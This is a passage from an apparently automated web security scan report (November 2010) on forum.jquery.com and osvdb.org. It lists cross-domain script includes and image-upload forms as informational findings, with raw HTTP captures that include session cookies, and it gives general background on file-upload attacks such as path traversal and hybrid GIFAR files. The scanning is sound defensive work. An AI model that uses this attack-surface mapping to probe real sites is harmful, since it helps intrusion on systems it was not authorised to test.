<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.5. http://forum.jquery.com/jquery-mobile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/jquery-mobile

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.zohostatic.com/discussions/v7/js/zdjquery.js
http://js.zohostatic.com/discussions/v7/js/ze_init.js
http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=146CD0CCDD0B8E3BD799AAF98F5C892D; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:33:29 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.6. http://forum.jquery.com/qunit-and-testing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/qunit-and-testing

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.zohostatic.com/discussions/v7/js/zdjquery.js
http://js.zohostatic.com/discussions/v7/js/ze_init.js
http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=E5466414448844E9BCAEB960C7DE0267; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:31:56 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.7. http://forum.jquery.com/subscribeRegister.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/subscribeRegister.do

Issue detail

The response dynamically includes the following script from another domain:

http://js.zohostatic.com/discussions/v6/js/jquery-1.3.1.min.js

Request

Response

6.8. http://forum.jquery.com/topic/how-can-i-help-9-5-2010 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/topic/how-can-i-help-9-5-2010

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.zohostatic.com/discussions/v7/js/zdjquery.js
http://js.zohostatic.com/discussions/v7/js/ze_init.js
http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=ECE9699A2EDA73BBD1A86295BA681CEC; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:34:40 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.9. http://forum.jquery.com/topic/looking-for-help-on-panel-development previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/topic/looking-for-help-on-panel-development

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.zohostatic.com/discussions/v7/js/zdjquery.js
http://js.zohostatic.com/discussions/v7/js/ze_init.js
http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=824525F306F33D1A660A41D747B3C3C5; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:34:19 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.10. http://forum.jquery.com/user/andrew_powell previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/andrew_powell

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.zohostatic.com/discussions/v7/js/zdjquery.js
http://js.zohostatic.com/discussions/v7/js/ze_init.js
http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=16C254095C2124D65EE64E94307DBCA0; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:14 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.11. http://forum.jquery.com/user/charlietfl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/charlietfl

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.zohostatic.com/discussions/v7/js/zdjquery.js
http://js.zohostatic.com/discussions/v7/js/ze_init.js
http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=59CEF57F096606606E0C367A9D77EDCB; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:27 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.12. http://forum.jquery.com/user/christophe previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/christophe

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.zohostatic.com/discussions/v7/js/zdjquery.js
http://js.zohostatic.com/discussions/v7/js/ze_init.js
http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=DA6C6F3D4597C88D4576CA4F90C364C0; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:46 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.13. http://forum.jquery.com/user/escape164 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/escape164

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.zohostatic.com/discussions/v7/js/zdjquery.js
http://js.zohostatic.com/discussions/v7/js/ze_init.js
http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js

Request

GET /user/escape164 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:22:49 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.14. http://forum.jquery.com/user/jeresig previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/jeresig

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.zohostatic.com/discussions/v7/js/zdjquery.js
http://js.zohostatic.com/discussions/v7/js/ze_init.js
http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=6B51C808310C43BC59A7FCE896A79140; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:01 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.15. http://forum.jquery.com/user/joern.zaefferer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/joern.zaefferer

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.zohostatic.com/discussions/v7/js/zdjquery.js
http://js.zohostatic.com/discussions/v7/js/ze_init.js
http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js

Request

GET /user/joern.zaefferer HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:23:11 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.16. http://forum.jquery.com/user/kbwood.au previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/kbwood.au

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.zohostatic.com/discussions/v7/js/zdjquery.js
http://js.zohostatic.com/discussions/v7/js/ze_init.js
http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=E6A0387222674E9994B5F79EBEB4FA46; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:38 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.17. http://forum.jquery.com/user/malsup previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/malsup

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.zohostatic.com/discussions/v7/js/zdjquery.js
http://js.zohostatic.com/discussions/v7/js/ze_init.js
http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js

Request

GET /user/malsup HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

6.18. http://forum.jquery.com/user/scottjehl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/scottjehl

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.zohostatic.com/discussions/v7/js/zdjquery.js
http://js.zohostatic.com/discussions/v7/js/ze_init.js
http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=05CE8F1E0AE7F496B5A09850FA785AAB; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:29:52 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.19. http://forum.jquery.com/user/wycats previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/wycats

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.zohostatic.com/discussions/v7/js/zdjquery.js
http://js.zohostatic.com/discussions/v7/js/ze_init.js
http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=25EEAA759D352A30C3AA8E23615DFCFD; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:10 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.20. http://osvdb.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://osvdb.org
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://opensecurityfoundation.org/projects/1.js?version=osvdb_1
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://widgets.twimg.com/j/2/widget.js
http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: osvdb.org
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=178338106.1286680872.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=178338106.713127995.1286680872.1286692001.1287528467.3

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 02:45:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
ETag: "46336199e77ce7e6bebae2bcb4884e09"
X-Runtime: 654
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _session_id=a02d1064db8b95f8cb722d0f270d56bf; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 72984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>OSVDB: The Open
...[SNIP]...
<div style="width:605px;margin-right:auto;margin-left:auto;">

<script type="text/javascript" src="http://opensecurityfoundation.org/projects/1.js?version=osvdb_1"></script>
...[SNIP]...
</p>

<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

7. File upload functionality previous next
There are 15 instances of this issue:

/about-the-jquery-forum
/developing-jquery-plugins
/jquery-conferences
/jquery-mobile
/qunit-and-testing
/topic/how-can-i-help-9-5-2010
/topic/looking-for-help-on-panel-development
/user/andrew_powell
/user/charlietfl
/user/christophe
/user/jeresig
/user/kbwood.au
/user/malsup
/user/scottjehl
/user/wycats

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:

File path traversal
Persistent cross-site scripting
Placing of other client-executable code into the domain
Transmission of viruses and other malware
Denial of service

You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Whether uploaded content can subsequently be downloaded via a URL within the application.
What Content-type and Content-disposition headers the application returns when the file's content is downloaded.
Whether it is possible to place executable HTML/JavaScript into the file, which executes when the file's contents are viewed.
Whether the application performs any filtering on the file extension or MIME type of the uploaded file.
Whether it is possible to construct a hybrid file containing both executable and non-executable content, to bypass any content filters - for example, a file containing both a GIF image and a Java archive (known as a GIFAR file).
What location is used to store uploaded content, and whether it is possible to supply a crafted filename to escape from this location.
Whether archive formats such as ZIP are unpacked by the application.
How the application handles attempts to upload very large files, or decompression bomb files.

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Use a server-generated filename if storing uploaded files on disk.
Inspect the content of uploaded files, and enforce a whitelist of accepted, non-executable content types. Additionally, enforce a blacklist of common executable formats, to hinder hybrid file attacks.
Enforce a whitelist of accepted, non-executable file extensions.
If uploaded files are downloaded by users, supply an accurate non-generic Content-type header, and also a Content-disposition header which specifies that browsers should handle the file as an attachment.
Enforce a size limit on uploaded files (for defence-in-depth, this can be implemented both within application code and in the web server's configuration.
Reject attempts to upload archive formats such as ZIP.

7.1. http://forum.jquery.com/about-the-jquery-forum previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/about-the-jquery-forum

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://forum.jquery.com/uploadImage.do

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

7.2. http://forum.jquery.com/developing-jquery-plugins previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/developing-jquery-plugins

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://forum.jquery.com/uploadImage.do

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

7.3. http://forum.jquery.com/jquery-conferences previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/jquery-conferences

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://forum.jquery.com/uploadImage.do

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

7.4. http://forum.jquery.com/jquery-mobile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/jquery-mobile

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://forum.jquery.com/uploadImage.do

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

7.5. http://forum.jquery.com/qunit-and-testing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/qunit-and-testing

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://forum.jquery.com/uploadImage.do

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

7.6. http://forum.jquery.com/topic/how-can-i-help-9-5-2010 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/topic/how-can-i-help-9-5-2010

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://forum.jquery.com/uploadImage.do

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

7.7. http://forum.jquery.com/topic/looking-for-help-on-panel-development previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/topic/looking-for-help-on-panel-development

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://forum.jquery.com/uploadImage.do

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

7.8. http://forum.jquery.com/user/andrew_powell previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/andrew_powell

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://forum.jquery.com/uploadImage.do

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

7.9. http://forum.jquery.com/user/charlietfl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/charlietfl

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://forum.jquery.com/uploadImage.do

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

7.10. http://forum.jquery.com/user/christophe previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/christophe

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://forum.jquery.com/uploadImage.do

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

7.11. http://forum.jquery.com/user/jeresig previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/jeresig

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://forum.jquery.com/uploadImage.do

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

7.12. http://forum.jquery.com/user/kbwood.au previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/kbwood.au

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://forum.jquery.com/uploadImage.do

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

7.13. http://forum.jquery.com/user/malsup previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/malsup

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://forum.jquery.com/uploadImage.do

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

7.14. http://forum.jquery.com/user/scottjehl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/scottjehl

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://forum.jquery.com/uploadImage.do

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

7.15. http://forum.jquery.com/user/wycats previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/wycats

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://forum.jquery.com/uploadImage.do

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

8. Email addresses disclosed previous next
There are 9 instances of this issue:

http://forum.jquery.com/developing-jquery-mobile/feed
